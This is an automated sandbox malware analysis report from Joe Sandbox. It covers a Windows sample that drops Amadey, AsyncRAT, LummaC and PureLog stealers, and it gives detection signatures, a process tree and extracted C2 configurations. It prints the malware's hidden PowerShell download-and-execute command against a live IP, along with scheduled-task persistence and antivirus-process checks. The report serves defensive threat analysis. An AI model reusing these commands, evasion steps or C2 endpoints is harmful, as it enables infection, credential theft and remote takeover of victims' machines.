Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QkRFz2sau5.exe

Overview

General Information

Sample name:QkRFz2sau5.exe
Analysis ID:1611846
MD5:1f52efaed8352cc7bb09755d30900e2e
SHA1:ae997617c4399fbba4eb692c0bba04a88141ad4e
SHA256:284c0140353b4ff318b05940dfb1c555df0f5cdc93d7cdffd43a9362ba24e20a
Infos:

Detection

Amadey, AsyncRAT, LiteHTTP Bot, LummaC Stealer, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AsyncRAT
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates HTA files
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • QkRFz2sau5.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\QkRFz2sau5.exe" MD5: 1F52EFAED8352CC7BB09755D30900E2E)
    • cmd.exe (PID: 5600 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 948 cmdline: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
    • mshta.exe (PID: 7188 cmdline: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE (PID: 7068 cmdline: "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" MD5: 6C050E46123A52196D2EBA9CCE989BCF)
          • skotes.exe (PID: 5176 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6C050E46123A52196D2EBA9CCE989BCF)
  • mshta.exe (PID: 556 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 6476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • skotes.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6C050E46123A52196D2EBA9CCE989BCF)
  • skotes.exe (PID: 1388 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6C050E46123A52196D2EBA9CCE989BCF)
    • 9c1024a1f1.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" MD5: C2C7D39D833E6BB3260147D6D46DD38B)
    • 935372fb1f.exe (PID: 280 cmdline: "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" MD5: BC9AC830C5F153ADD0C6F32C17F0FF61)
    • 7ecb69d7f1.exe (PID: 7200 cmdline: "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)
      • cmd.exe (PID: 5584 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 1976 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3228 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 2816 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 5368 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6664 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2436 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 6084 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 4888 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6188 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Macromedia.com (PID: 3540 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)
          • schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
            • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • MSBuild.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 1500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • choice.exe (PID: 5840 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • 33c3d7c7bd.exe (PID: 324 cmdline: "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" MD5: DB3632EF37D9E27DFA2FD76F320540CA)
    • f891ed3167.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • f891ed3167.exe (PID: 5848 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • f891ed3167.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • WerFault.exe (PID: 6740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • f8e8a2d2f0.exe (PID: 4396 cmdline: "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)
      • f8e8a2d2f0.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)
      • WerFault.exe (PID: 5340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 908 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • d9caf9fc21.exe (PID: 6088 cmdline: "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" MD5: F071BEEBFF0BCFF843395DC61A8D53C8)
    • c7f37422c5.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" MD5: DF98D01767142C162C79285A0788894E)
  • wscript.exe (PID: 2004 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • AchillesGuard.com (PID: 2308 cmdline: "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r" MD5: 62D09F076E6E0240548C2F837536A46A)
      • MSBuild.exe (PID: 1884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: LummaC

{"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
          C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exeJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 2 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                      • 0x9e31:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                      0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                      • 0x9d9f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                      • 0xb0f8:$a2: Stub.exe
                      • 0xb188:$a2: Stub.exe
                      • 0x6bbd:$a3: get_ActivatePong
                      • 0x9fb7:$a4: vmware
                      • 0x9e2f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                      • 0x790c:$a6: get_SslClient
                      00000010.00000002.22377836357.0000000000413000.00000040.00000001.01000000.00000013.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        Click to see the 113 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        29.3.Macromedia.com.4985ad0.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                          29.3.Macromedia.com.4985ad0.0.unpackrat_win_asyncratDetect AsyncRAT based on specific stringsSekoia.io
                          • 0x48fd:$str01: get_ActivatePong
                          • 0x564c:$str02: get_SslClient
                          • 0x5668:$str03: get_TcpClient
                          • 0x3f13:$str04: get_SendSync
                          • 0x3f63:$str05: get_IsConnected
                          • 0x4692:$str06: set_UseShellExecute
                          • 0x7e15:$str07: Pastebin
                          • 0x7e97:$str08: Select * from AntivirusProduct
                          • 0x8e38:$str09: Stub.exe
                          • 0x8ec8:$str09: Stub.exe
                          • 0x7bef:$str10: timeout 3 > NUL
                          • 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
                          • 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                          29.3.Macromedia.com.4985ad0.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                          • 0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                          29.3.Macromedia.com.4985ad0.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                          • 0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                          • 0x8e38:$a2: Stub.exe
                          • 0x8ec8:$a2: Stub.exe
                          • 0x48fd:$a3: get_ActivatePong
                          • 0x7cf7:$a4: vmware
                          • 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                          • 0x564c:$a6: get_SslClient
                          29.3.Macromedia.com.499e4c0.3.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                            Click to see the 95 entries

                            Other

                            SourceRuleDescriptionAuthorStrings
                            amsi32_824.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                              amsi64_6476.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5600, ProcessName: cmd.exe
                                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5600, ProcessName: cmd.exe
                                Sigma detected: PowerShell DownloadFile
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ProcessId: 7188, ProcessName: mshta.exe
                                Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Macromedia.com F, ParentImage: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com, ParentProcessId: 3540, ParentProcessName: Macromedia.com, ProcessCommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7184, ProcessName: schtasks.exe
                                Sigma detected: Suspicious MSHTA Child Process
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ProcessId: 7188, ProcessName: mshta.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1412, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2004, ProcessName: wscript.exe
